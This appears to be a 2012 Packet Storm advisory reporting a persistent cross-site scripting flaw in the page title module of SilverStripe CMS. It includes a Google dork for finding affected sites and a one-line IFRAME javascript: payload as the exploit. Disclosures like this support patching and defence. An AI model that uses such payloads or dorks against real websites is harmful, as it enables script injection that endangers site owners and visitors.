Silverstripe CMS suffers from a cross site scripting vulnerability in the page title module.
2214fd112af4a84325c1cf7a4cbc530c ____ ______ _____|__| | ____ ____ | | _____ _____\_ |__ __| _/____
_/ __ \\____ \/ ___/ | | / _ \ / \| | \__ \ / \| __ \ / __ |\__ \
\ ___/| |_> >___ \| | |_( <_> ) | \ |__/ __ \| Y Y \ \_\ \/ /_/ | / __ \_
\___ > __/____ >__|____/\____/|___| /____(____ /__|_| /___ /\____ |(____ /
\/|__| \/ \/ \/ \/ \/ \/ \/
silverstripe CMS persisten XSS vulnerabilties
vendor: http://demo.silverstripe.org
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: epsilonlambda.wordpress.com
Google dork: Powered by the SilverStripe Open Source CMS
* Persistent XSS vulnerability
The page title module of this CMS is vulnerable to persistent XSS.
Exploit: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
PoC: http://imageshack.us/photo/my-images/341/silverstripe.png/
Greets to side-effects and Taashu :)
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!